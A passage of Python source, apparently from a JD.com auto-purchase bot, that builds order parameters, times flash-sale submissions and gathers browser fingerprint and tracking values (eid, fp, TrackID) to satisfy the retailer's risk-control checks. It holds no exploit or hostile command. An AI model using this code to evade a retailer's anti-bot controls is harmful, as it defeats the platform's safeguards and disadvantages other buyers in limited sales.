get_confirm_order_promise_uuid_headers = self.headers.copy() get_confirm_order_headers = self.headers.copy() def parsing_submit_page_data(html): data = dict() page_data = nested_parser('{', '}', html, 'token2') if '"errId":"0"' not in page_data: logger.error('加载订单页数据失败,响应数据:%s', page_data) raise AsstException('加载订单页数据失败') if isinstance(page_data, str): token2search = re.search(r'"token2":\"(.*)\"', page_data) if token2search: data['token2'] = token2search.group(1) skulistsearch = re.search(r'"skulist":\"(.*)\"', page_data) if skulistsearch: data['skulist'] = skulistsearch.group(1) traceIdsearch = re.search(r'"traceId":\"(.*)\"', page_data) if traceIdsearch: data['traceid'] = traceIdsearch.group(1) mainSkusearch = re.search(r'"promotion":({([^}])*})', page_data) if mainSkusearch: data['discountPrice'] = json.loads(mainSkusearch.group(1))['discountPrice'] cidsearch = re.search(r'"cid":\"(.*)\"', page_data) if cidsearch: data['cid'] = cidsearch.group(1).split('_')[2] sucPageTypesearch = re.search(r'"sucPageType":\"(.*)\"', page_data) if sucPageTypesearch: data['sucPageType'] = sucPageTypesearch.group(1) vender_cart = nested_parser('[', ']', page_data, '"jdShipment":') if isinstance(vender_cart, str): venderIdsearch = re.search(r'"venderId":\"(.*)\"', vender_cart) if venderIdsearch: data['venderId'] = venderIdsearch.group(1) jdShipmentsearch = re.search(r'"jdShipment":\"(.*)\"', vender_cart) if jdShipmentsearch: data['jdShipment'] = jdShipmentsearch.group(1) shipment_str = nested_inner_parser('[', ']', vender_cart, '"promiseSendPay":') if isinstance(shipment_str, str): shipment = json.loads(shipment_str) if shipment: data['shipment'] = shipment 
return data def parse_promise_uuid(resp_text): resp_json = nested_parser('{', '}', resp_text, "errId") if isinstance(resp_json, str): ship_effect = json.loads(resp_json) promise_uuid = ship_effect['pickshipment']['promiseUuid'] elif isinstance(resp_json, list): ship_effect = json.loads(resp_json[0]) promise_uuid = ship_effect['pickshipment']['promiseUuid'] else: promise_uuid = '' return promise_uuid def get_confirm_order_page_request(sku_id, server_buy_time=int(time.time())): logger.info('加载订单页面请求') jxsid = str(int(time.time() * 1000)) + str(random.random())[2:7] url = 'https://wq.jd.com/deal/confirmorder/main?jxsid=' + jxsid sceneval = '2' referer_url = f'https://item.m.jd.com/product/{sku_id}.html?sceneval={sceneval}&jxsid={jxsid}' commlist = f'{sku_id},,1,{sku_id},1,0,0' confirm_order_page_params = f'{self.item_url_param.get(sku_id)}&commlist={commlist}' \ f'&wdref={parse.quote(referer_url, safe="")}' referer = f'{referer_url}&{confirm_order_page_params}' get_confirm_order_page_request_headers['Referer'] = referer_url get_confirm_order_promise_uuid_headers['Referer'] = referer if not self.get_submit_referer.get(sku_id): self.get_submit_referer[sku_id] = referer self.sess.cookies.set('_modc', zzz) retry_interval = config.retry_interval retry_count = 0 submit_page_data = self.get_submit_page_data.get(sku_id) while not submit_page_data: if retry_count >= 10: logger.error("加载订单页面请求失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_confirm_order_page_request_headers, params=confirm_order_page_params, cookies=self.get_cookies_str_by_domain_or_path('wq.jd.com')) resp_data = resp.body if resp_data.startswith("<!DOCTYPE html>"): submit_page_data = self.get_submit_page_data.get(sku_id) if not submit_page_data: submit_page_data = parsing_submit_page_data(resp_data) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) self.get_submit_page_data[sku_id] = submit_page_data break except Exception as e: logger.error("异常信息:%s", e) retry_count += 1 logger.info("商品%s第%s次加载订单页面请求失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) promise_uuid_retry_interval = 0.02 promise_uuid = self.get_promiseUuid.get(sku_id) if not promise_uuid: with self.sem: # 订单页参数请求 if not self.get_promiseUuid.get(sku_id): i = 0 while i < 8: try: shipeffect_params = { 'reg': 1 , 'action': 1 , 'reset': 1 , 'callback': f'preShipeffectCb{self.letterMap[i + 1]}' , 'r': random.random() , 'sceneval': 2 , 'traceid': submit_page_data.get('traceid') } logger.info('加载订单页参数请求') url = 'https://wq.jd.com/deal/mship/shipeffect' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_confirm_order_promise_uuid_headers, cookies=self.get_cookies_str_by_domain_or_path( 'wq.jd.com'), params=shipeffect_params) promise_uuid = parse_promise_uuid(resp.body) if promise_uuid is not None: self.get_promiseUuid[sku_id] = promise_uuid break # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() except Exception as e: logger.error("异常信息:%s", e) i += 1 logger.info("商品%s第%s次订单页参数请求失败,%s秒后重试", sku_id, i, promise_uuid_retry_interval) time.sleep(promise_uuid_retry_interval) submit_data = self.get_submit_data.get(sku_id) if not submit_data: with self.sem: # 订单参数处理 if not self.get_submit_data.get(sku_id): discountPrice = submit_page_data.pop('discountPrice', '') cid = submit_page_data.pop('cid', '') shipment = submit_page_data.pop('shipment', 
'') venderId = submit_page_data.pop('venderId', '') jdShipment = submit_page_data.pop('jdShipment', '') params_list = [] params_list.append( 'paytype=0&paychannel=1&action=1&reg=1&type=0&gpolicy=&platprice=0&pick=&savepayship=0&sceneval=2&setdefcoupon=0') params_list.append('&tuanfull=') params_list.append(submit_page_data.pop('sucPageType', '')) for key, value in submit_page_data.items(): params_list.append(f'&{key}={value}') params_list.append(f'&valuableskus={sku_id},{config.num},{discountPrice},{cid}') params_list.append(f'&commlist={commlist}') params_list.append('&dpid=&scan_orig=') # params_list.append(f'&dpid={?}') # params_list.append(f'&scan_orig={?}') # 处理shipment shipmentData = None shipName = None shipType = '0' for i, data in enumerate(shipment): shipType = data.get('type') if shipType == '0': shipmentData = data shipName = ["jd311", "jdjzd", "jd411"][i] break elif shipType == '1' \ or shipType == '2': shipmentData = data shipName = "shipsop" break elif shipType == '3' \ or shipType == '6': # var _ = new K.default(e,n,t,h,i); # _.supported ? u[_.name] = _ : p[_.name] = _; break elif shipType == '4': # "1" == n.selected && "0" == e.jdShipment && (e.isTenVideo = !0, # h.isTenVideo = !0, # h.fpbarTipLoc = e.isloc, # h.fpbarTipTen = !e.isloc); break elif shipType == '5': # var g, y, b = !1; # if (ce.supSopJd = !0, # e.smallProducts.length > 0) # (0, # D.default)(g = oe.smallShipments).call(g, function(a) { # var r = new a(e,n,t,h,i); # r.supported ? u[r.name] = r : p[r.name] = r # }); # if (e.laProducts.length > 0) # (0, # D.default)(y = oe.largeShipments).call(y, function(a) { # var r = new a(e,n,t,h,i); # r.supported ? (u[r.name] = r, # b = !0) : p[r.name] = r # }); # if (e.laProducts.length > 0) { # var w = new U.default(e,n,t,h,i); # w.supported && !b ? u[w.name] = w : p[w.name] = w # } break elif shipType == '7': # if ("1" == n.supported) { # var S = new G.default(e,n,t,h,i); # S.supported ? u[S.name] = S : p[S.name] = S # } break elif shipType == '8': # var x = new F.default(e,n,t,h,i); # x.supported && (u[x.name] = x); break elif shipType == '9': # var P = new M.default(e,n,t,h,i); # P.supported ? u[P.name] = P : p[P.name] = P; break elif shipType == '10': # var j = new H.default(e,n,t,h,i); # j.supported ? 
u[j.name] = j : p[j.name] = j break # else: # break # if not shipmentData: # raise AsstException('抢购失败,无法获取订单页收获地址数据,本次抢购结束') # exit(-1) if shipmentData.get('selected') != '1': raise AsstException('抢购失败,订单页收获地址未自动选择,本次抢购结束') exit(-1) ship_list = None promise_uuid_index = None if shipType == '0': ship_list = [''] * 25 promise_uuid_index = 22 elif shipType == '1': ship_list = [''] * 9 promise_uuid_index = 7 elif shipType == '2' \ or shipType == '5' \ or shipType == '9': ship_list = [''] * 20 promise_uuid_index = 17 elif shipType == '8': ship_list = [''] * 10 promise_uuid_index = 8 elif shipType == '10': ship_list = [''] * 5 promise_uuid_index = 4 else: ship_list = [''] * 25 promise_uuid_index = 22 shipId = shipmentData.get('id') ship_list[0] = shipType ship_list[1] = shipId if shipType in ['1', '2', '5', '9', '10']: ship_list[2] = venderId elif shipType == '8': ship_list[2] = '0' else: ship_list[17] = '0' ship_list[promise_uuid_index] = promise_uuid if shipType == '0': # 处理shipName if shipName == 'jd311': ship_list[2] = '4' ship_list[7] = '1' ship_list[9] = shipmentData.get('promiseDate') ship_list[10] = shipmentData.get('promiseTimeRange') ship_list[11] = shipmentData.get('promiseSendPay') ship_list[12] = shipmentData.get('batchId') ship_list[20] = '' elif shipName == 'jdjzd': ship_list[2] = '6' ship_list[7] = '3' ship_list[9] = shipmentData.get('promiseDate') ship_list[10] = shipmentData.get('promiseTimeRange') ship_list[11] = shipmentData.get('promiseSendPay') ship_list[12] = shipmentData.get('batchId') # t.calendarTag ship_list[18] = '' # t.calendarTag # && t.calendarTag.length # && (0, r.default)(y=t.calendarTag).call(y, function(e){return e.selected}).tagType || "" ship_list[20] = '' elif shipName == 'jd411': ship_list[2] = '5' ship_list[7] = '2' ship_list[11] = shipmentData.get('promiseSendPay') ship_list[5] = '0' ship_list[19] = '0' ship_list[21] = '0' ship_list[24] = '' elif shipType == '2': if shipmentData: ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = shipmentData.get('promiseTimeRange') ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' elif shipType == '3' \ or shipType == '6': pass elif shipType == '5': if shipmentData: ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = shipmentData.get('promiseTimeRange') ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' ship_list[15] = "1" if "shipsopjzd" == shipName: ship_list[15] = "2" ship_list[16] = ''# t.calendarTag # && t.calendarTag.length # && (0, c.default)(w=t.calendarTag).call(w, function(e){return e.selected}).tagType | | ""; ship_list[13] = '0' ship_list[19] = '' elif shipType == '7': pass elif shipType == '8': if shipmentData: timeRange = shipmentData.get('promiseTimeRange') ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = timeRange ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') if '立即送达' in timeRange: ship_list[7] = '1' else: ship_list[7] = '2' else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' elif shipType == '9': if shipmentData: timeRange = shipmentData.get('promiseTimeRange') ship_list[3] = shipmentData.get('promiseDate') if '下单' in timeRange: ship_list[4] = '立即送达' elif timeRange: ship_list[4] = timeRange else: ship_list[4] = '' ship_list[5] = 
shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') if '下单' in timeRange: ship_list[14] = '1' elif timeRange: ship_list[14] = '2' else: ship_list[14] = '' else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' ship_list[14] = '' elif shipType == '10': pass else: pass params_list.append(f'&ship={parse.quote("|".join(ship_list), safe="{|,:}")}') submit_data = ''.join(params_list) if submit_data: # 保存submit_data self.get_submit_data[sku_id] = submit_data return submit_data def submit_order_request(submit_data, count): # 新提交订单请求 logger.info('提交订单请求') submit_data = f'{submit_data}&r={random.random()}&callback=confirmCb{self.letterMap[count]}' get_confirm_order_headers['Referer'] = self.get_submit_referer.get(sku_id) try: resp = http_util.send_http_request(self.socket_client, url='https://wq.jd.com/deal/msubmit/confirm', method='GET', headers=get_confirm_order_headers, cookies=self.get_cookies_str_by_domain_or_path('wq.jd.com'), params=submit_data) response_data = resp.body if resp.status == requests.codes.OK: if response_data: if '"errId":"0"' in response_data: logger.info('订单提交完成,在手机APP中可以查看是否完成下单') return True else: logger.info('订单提交失败') logger.info(f'响应数据:\n{response_data}') return False else: logger.info('订单提交失败,响应码:%s', resp.status) return False else: logger.info('订单提交失败,响应码:%s', resp.status) logger.info(f'响应数据:\n{response_data}') return False except Exception as e: logger.error(e) return False else: def get_confirm_order_page_request(sku_id, server_buy_time=int(time.time())): exit(-1) def submit_order_request(submit_data, count): exit(-1) self.request_info['get_confirm_order_page_request'] = get_confirm_order_page_request self.request_info['submit_order_request'] = submit_order_request return server_buy_time, realy_buy_time @check_login def buy_item_in_stock(self, sku_ids, area, wait_all=False, stock_interval=3, submit_retry=3, submit_interval=5): """根据库存自动下单商品 :param sku_ids: 商品id。可以设置多个商品,也可以带数量,如:'1234' 或 '1234,5678' 或 '1234:2' 或 '1234:2,5678:3' :param area: 地区id :param wait_all: 是否等所有商品都有货才一起下单,可选参数,默认False :param stock_interval: 查询库存时间间隔,可选参数,默认3秒 :param submit_retry: 提交订单失败后重试次数,可选参数,默认3次 :param submit_interval: 提交订单失败后重试时间间隔,可选参数,默认5秒 :return: """ items_dict = parse_sku_id(sku_ids) items_list = list(items_dict.keys()) area_id = parse_area_id(area=area) if not wait_all: logger.info('下单模式:%s 任一商品有货并且未下架均会尝试下单', items_list) while True: for (sku_id, count) in items_dict.items(): if not self.if_item_can_be_ordered(sku_ids={sku_id: count}, area=area_id): logger.info('%s 不满足下单条件,%ss后进行下一次查询', sku_id, stock_interval) else: logger.info('%s 满足下单条件,开始执行', sku_id) self._cancel_select_all_cart_item() self._add_or_change_cart_item(self.get_cart_detail(), sku_id, count) if self.submit_order_with_retry(submit_retry, submit_interval): return time.sleep(stock_interval) else: logger.info('下单模式:%s 所有都商品同时有货并且未下架才会尝试下单', items_list) while True: if not self.if_item_can_be_ordered(sku_ids=sku_ids, area=area_id): logger.info('%s 不满足下单条件,%ss后进行下一次查询', items_list, stock_interval) else: logger.info('%s 满足下单条件,开始执行', items_list) self._cancel_select_all_cart_item() shopping_cart = self.get_cart_detail() for (sku_id, count) in items_dict.items(): self._add_or_change_cart_item(shopping_cart, sku_id, count) if self.submit_order_with_retry(submit_retry, submit_interval): return time.sleep(stock_interval) @check_login def exec_reserve_seckill_by_time(self, config): """定时抢购`预约抢购商品` 一定要确保预约的商品在购物车中才能使用这种方式!!!否则只能用其他方式 预约抢购商品特点: 1.需要提前点击预约 
2.大部分此类商品在预约后自动加入购物车,在购物车中可见但无法勾选✓,也无法进入到结算页面(重要特征) 3.到了抢购的时间点后,才能勾选并结算下单 注意: 1.请在抢购开始前手动清空购物车中此类无法勾选的商品!(因为脚本在执行清空购物车操作时,无法清空不能勾选的商品) """ if not config: raise AsstException('初始化配置为空!') self.config = config # 开抢前清空购物车 self.clear_cart() sku_id = config.sku_id area_id = parse_area_id(self.area_id) cat = self.item_cat.get(sku_id) retry_count = 0 while not cat: retry_count += 1 logger.info('第 %s 次获取商品页信息', retry_count) page = self._get_item_detail_page(sku_id) if not self.parse_item_detail_page(sku_id, page): if retry_count > 10: logger.error('无法获取cat,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次获取商品页信息失败:%s', page) time.sleep(1) continue else: cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) # special_attrs = self.special_attrs.get(sku_id) # [前置]初始化预约抢购时间 server_buy_time, realy_buy_time = self.init_yuyue_buy_time(sku_id, self.headers.copy(), { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, }) # 1.初始化正常下单流程请求信息、方法 self.init_default_order_request_method(config.fast_mode, config.is_risk_control) def start_func(): # 3.执行 if config.is_pass_cart is not True: sku_ids = {config.sku_id: config.num} add_cart_request = self.request_info['add_cart_request'] for sku_id, count in parse_sku_id(sku_ids=sku_ids).items(): payload = { 'pid': sku_id, 'pcount': count, 'ptype': 1, } add_cart_request(payload) # 获取订单结算页面信息 self.get_checkout_page_detail() retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') self.start_func = start_func # 2.倒计时 logger.info('准备抢购商品id为:%s', config.sku_id) Timer(buy_time=realy_buy_time, sleep_interval=config.sleep_interval, fast_sleep_interval=config.fast_sleep_interval, is_sync=False, assistant=self).start() if self.config.fast_mode: self.close_now() # 初始化下单必须参数 def init_order_request_info(self): # 获取下单必须参数 br = self.br # 获取:ipLoc-djd、ipLocation if address_util.get_user_address(self) is not True: logger.error('获取地址信息失败,请重试!') exit(-1) if self.use_new: # 获取:eid、fp、jstub、token、sdkToken(默认为空) def jsCallback(data): # print(data) self.data = data if len(data) > 0: logger.info('自动初始化下单参数成功!') return True return False jsFunc = CustomBrowser.JsScript('return (function(){var obj={};for(var count=0;count<20;count++){' 'try{obj=getJdEid()}catch(e){count++;sleep(500)}};return obj})()', jsCallback) count = 0 while True: if br.openUrl('https://idt.jd.com/paypwd/toUpdateOrForget/', jsFunc): if not len(self.data) > 0: if count > 3: logger.error( '初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) else: break else: if count > 3: logger.error('初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) else: # 获取:eid、fp、track_id、risk_control(默认为空) def jsCallback(data): # print(data) eid = data['eid'] fp = data['fp'] track_id = data['trackId'] if eid: self.eid = eid if fp: self.fp = fp if track_id: self.track_id = track_id if eid and fp and track_id: logger.info('自动初始化下单参数成功!') return True return False jsFunc = CustomBrowser.JsScript('return (function(){var getCookie=function(name){' 'var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");' 'if(arr=document.cookie.match(reg)){return 
unescape(arr[2]);}else{return ' 'null;}},obj={eid:"",fp:"",trackId:""};for(var count=0;count<20;count++){' 'try{getJdEid(function(eid, fp, udfp){var trackId=getCookie("TrackID");' 'if(eid&&fp&&trackId){obj.eid=eid;obj.fp=fp;obj.trackId=trackId;return obj;}' 'else{count++;sleep(500)}})}catch(e){count++;sleep(500)}};return obj})()', jsCallback) # headers = { # # 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', # 'accept-encoding': 'gzip, deflate, br', # 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8', # 'cache-control': 'max-age=0', # 'dnt': '1', # 'sec-fetch-dest': 'document', # 'sec-fetch-mode': 'navigate', # 'sec-fetch-site': 'none', # 'sec-fetch-user': '?1', # 'upgrade-insecure-requests': '1', # } count = 0 while True: if br.openUrl('https://order.jd.com/center/list.action', jsFunc): if not self.eid or not self.fp or not self.track_id: if count > 3: logger.error( '初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) else: break else: if count > 3: logger.error('初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) if br: # 关闭浏览器 br.quit() def init_default_order_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # self.get_and_update_cookies_str() # config = self.config # 初始化添加购物车请求方法 add_cart_request_headers = self.headers.copy() if fast_mode: # add_cart_request_headers['cookie'] = cookie_str def add_cart_request(params): # 为提高性能,并发时先校验一次,不满足再进入锁 if not self.is_add_cart_request.get(0): i = 0 while i < 3: with self.sem: # 进入锁后,需进行二次校验,要确保只请求了一次 if not self.is_add_cart_request.get(0): logger.info('添加购物车请求') try: def res_func(_conn): while True: data = _conn.recv(1) _conn.invalidate() logger.info('添加购物车请求已接收-为提高抢购速度,已截断响应数据') return None url = 'https://cart.jd.com/gate.action' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=add_cart_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'cart.jd.com'), params=params, res_func=res_func) self.is_add_cart_request[0] = True # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() break except Exception as e: i += 1 logger.error('添加购物车请求异常,开始第 %s 次重试,信息:%s', i, e) else: break else: def add_cart_request(params): i = 0 while i < 3: try: resp = self.sess.get(url='https://cart.jd.com/gate.action', headers=add_cart_request_headers, params=params, timeout=(0.2, 0.03)) if 'https://cart.jd.com/cart.action' in resp.url: # 套装商品加入购物车后直接跳转到购物车页面 result = True else: # 普通商品成功加入购物车后会跳转到提示 "商品已成功加入购物车!" 
页面 soup = BeautifulSoup(resp.text, "html.parser") result = bool(soup.select('h3.ftx-02')) # [<h3 class="ftx-02">商品已成功加入购物车!</h3>] if result: logger.info('%s 已成功加入购物车', params['pid']) break else: i += 1 logger.error('%s 添加购物车失败,开始第 %s 次重试', params['pid'], i) logger.error('响应数据:%s', resp) except requests.exceptions.ConnectTimeout as e: i += 1 logger.error('%s 添加购物车请求发送超时,开始第 %s 次重试', params['pid'], i) except requests.exceptions.ReadTimeout as e: logger.info('已发送添加到购物车请求,为提高抢购速度,已截断响应数据') break self.request_info['add_cart_request'] = add_cart_request get_checkout_page_request_headers = self.headers.copy() # 初始化订单结算页请求方法 if fast_mode and is_risk_control is False: # get_checkout_page_request_headers['cookie'] = cookie_str def get_checkout_page_request(params): logger.info('订单结算请求') i = 0 def res_func(conn): while True: data = conn.recv(1) conn.invalidate() logger.info('订单结算请求已接收-为提高抢购速度,已截断响应数据') return None if not self.is_get_checkout_page.get(0): while i < 3: try: url = 'https://trade.jd.com/shopping/order/getOrderInfo.action' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_checkout_page_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'trade.jd.com'), params=params, res_func=res_func) self.is_get_checkout_page[0] = True # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() break except Exception as e: i += 1 logger.error('订单结算请求错误,开始第 %s 次重试,信息:%s', i, e) else: def get_checkout_page_request(params): i = 0 resp = None while i < 3: try: # url = 'https://cart.jd.com/gotoOrder.action' resp = self.sess.get(url='https://trade.jd.com/shopping/order/getOrderInfo.action', headers=get_checkout_page_request_headers, params=params, timeout=(0.2, 0.07)) if not response_status(resp): logger.error('获取订单结算页信息失败') return soup = BeautifulSoup(resp.text, "html.parser") self.risk_control = get_tag_value(soup.select('input#riskControl'), 'value') # order_detail = { # 'address': soup.find('span', id='sendAddr').text[5:], # remove '寄送至: ' from the begin # 'receiver': soup.find('span', id='sendMobile').text[4:], # remove '收件人:' from the begin # 'total_price': soup.find('span', id='sumPayPriceId').text[1:], # remove '¥' from the begin # 'items': [] # } # T O D O: 这里可能会产生解析问题,待修复 # for item in soup.select('div.goods-list div.goods-items'): # div_tag = item.select('div.p-price')[0] # order_detail.get('items').append({ # 'name': get_tag_value(item.select('div.p-name a')), # 'price': get_tag_value(div_tag.select('strong.jd-price'))[2:], # remove '¥ ' from the begin # 'num': get_tag_value(div_tag.select('span.p-num'))[1:], # remove 'x' from the begin # 'state': get_tag_value(div_tag.select('span.p-state')) # in stock or out of stock # }) # logger.info("下单信息:%s", order_detail) # return order_detail return except requests.exceptions.ConnectTimeout as e: i += 1 logger.error('订单结算页面数据连接超时,开始第 %s 次重试', i) except requests.exceptions.ReadTimeout as e: logger.info('已发送订单结算请求,为提高抢购速度,已截断响应数据') break except Exception as e: logger.error('订单结算页面数据解析异常(可以忽略),报错信息:%s', e) if resp: logger.error('resp.text:%s', resp.text) break self.request_info['get_checkout_page_request'] = get_checkout_page_request # 初始化提交订单请求方法 submit_order_request_data = { 'overseaPurchaseCookies': '', 'vendorRemarks': '[]', 'submitOrderParam.sopNotPutInvoice': 'false', 'submitOrderParam.trackID': 'TestTrackId', 'submitOrderParam.ignorePriceChange': '0', 'submitOrderParam.btSupport': '0', 'riskControl': self.risk_control, 
'submitOrderParam.isBestCoupon': 1, 'submitOrderParam.jxj': 1, 'submitOrderParam.trackId': self.track_id, # T o d o: need to get trackId 'submitOrderParam.eid': self.eid, 'submitOrderParam.fp': self.fp, 'submitOrderParam.needCheck': 1 } submit_order_request_headers = { 'User-Agent': self.user_agent, 'Host': 'trade.jd.com', 'Referer': 'https://trade.jd.com/shopping/order/getOrderInfo.action' } # 如果有密码则设置 payment_pwd = global_config.get('account', 'payment_pwd') if payment_pwd: submit_order_request_data['submitOrderParam.payPassword'] = encrypt_payment_pwd(payment_pwd) if fast_mode: # submit_order_request_headers['cookie'] = cookie_str def submit_order_request(): submit_order_request_data['riskControl'] = self.risk_control logger.info('提交订单请求') try: resp = http_util.send_http_request(self.socket_client, url='https://trade.jd.com/shopping/order/submitOrder.action', method='POST', headers=submit_order_request_headers, cookies=self.get_cookies_str_by_domain_or_path('trade.jd.com'), data=submit_order_request_data) response_data = resp.body if response_data: try: resp_json = json.loads(response_data) if resp_json.get('success'): order_id = resp_json.get('orderId') logger.info('订单提交成功! 订单号:%s', order_id) if self.send_message: self.messenger.send(text='jd-assistant 订单提交成功', desp='订单号:%s' % order_id) return True else: message, result_code = resp_json.get('message'), resp_json.get('resultCode') if result_code == 0: message = message + '(下单失败)' # self._save_invoice() # message = message + '(下单商品可能为第三方商品,将切换为普通发票进行尝试)' elif result_code == 60077: message = message + '(可能是购物车为空 或 未勾选购物车中商品)' elif result_code == 60123: message = message + '(需要在config.ini文件中配置支付密码)' elif result_code == 600158: logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'很抱歉,您抢购的商品无货!本次抢购结束') return True logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'响应数据:\n{resp_json}') return False except Exception: logger.info('数据解析异常,响应数据:\n %s', response_data) return False else: logger.info('下单请求异常,无响应数据') return False except Exception as e: logger.error(e) return False else: def submit_order_request(): try: submit_order_request_data['riskControl'] = self.risk_control resp = self.sess.post(url='https://trade.jd.com/shopping/order/submitOrder.action', headers=submit_order_request_headers, data=submit_order_request_data) # 暂时不设置超时时间 # resp = self.sess.post(url=url, data=data, headers=headers, timeout=(0.1, 0.08)) resp_json = json.loads(resp.text) # 返回信息示例: # 下单失败 # {'overSea': False, 'orderXml': None, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60123, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '请输入支付密码!'} # {'overSea': False, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'orderXml': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60017, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '您多次提交过快,请稍后再试'} # {'overSea': False, 'orderXml': None, 
'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60077, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '获取用户订单信息失败'} # {"cartXml":null,"noStockSkuIds":"xxx","reqInfo":null,"hasJxj":false,"addedServiceList":null,"overSea":false,"orderXml":null,"sign":null,"pin":"xxx","needCheckCode":false,"success":false,"resultCode":600157,"orderId":0,"submitSkuNum":0,"deductMoneyFlag":0,"goJumpOrderCenter":false,"payInfo":null,"scaleSkuInfoListVO":null,"purchaseSkuInfoListVO":null,"noSupportHomeServiceSkuList":null,"msgMobile":null,"addressVO":{"pin":"xxx","areaName":"","provinceId":xx,"cityId":xx,"countyId":xx,"townId":xx,"paymentId":0,"selected":false,"addressDetail":"xx","mobile":"xx","idCard":"","phone":null,"email":null,"selfPickMobile":null,"selfPickPhone":null,"provinceName":null,"cityName":null,"countyName":null,"townName":null,"giftSenderConsigneeName":null,"giftSenderConsigneeMobile":null,"gcLat":0.0,"gcLng":0.0,"coord_type":0,"longitude":0.0,"latitude":0.0,"selfPickOptimize":0,"consigneeId":0,"selectedAddressType":0,"siteType":0,"helpMessage":null,"tipInfo":null,"cabinetAvailable":true,"limitKeyword":0,"specialRemark":null,"siteProvinceId":0,"siteCityId":0,"siteCountyId":0,"siteTownId":0,"skuSupported":false,"addressSupported":0,"isCod":0,"consigneeName":null,"pickVOname":null,"shipmentType":0,"retTag":0,"tagSource":0,"userDefinedTag":null,"newProvinceId":0,"newCityId":0,"newCountyId":0,"newTownId":0,"newProvinceName":null,"newCityName":null,"newCountyName":null,"newTownName":null,"checkLevel":0,"optimizePickID":0,"pickType":0,"dataSign":0,"overseas":0,"areaCode":null,"nameCode":null,"appSelfPickAddress":0,"associatePickId":0,"associateAddressId":0,"appId":null,"encryptText":null,"certNum":null,"used":false,"oldAddress":false,"mapping":false,"addressType":0,"fullAddress":"xxxx","postCode":null,"addressDefault":false,"addressName":null,"selfPickAddressShuntFlag":0,"pickId":0,"pickName":null,"pickVOselected":false,"mapUrl":null,"branchId":0,"canSelected":false,"address":null,"name":"xxx","message":null,"id":0},"msgUuid":null,"message":"xxxxxx商品无货"} # {'orderXml': None, 'overSea': False, 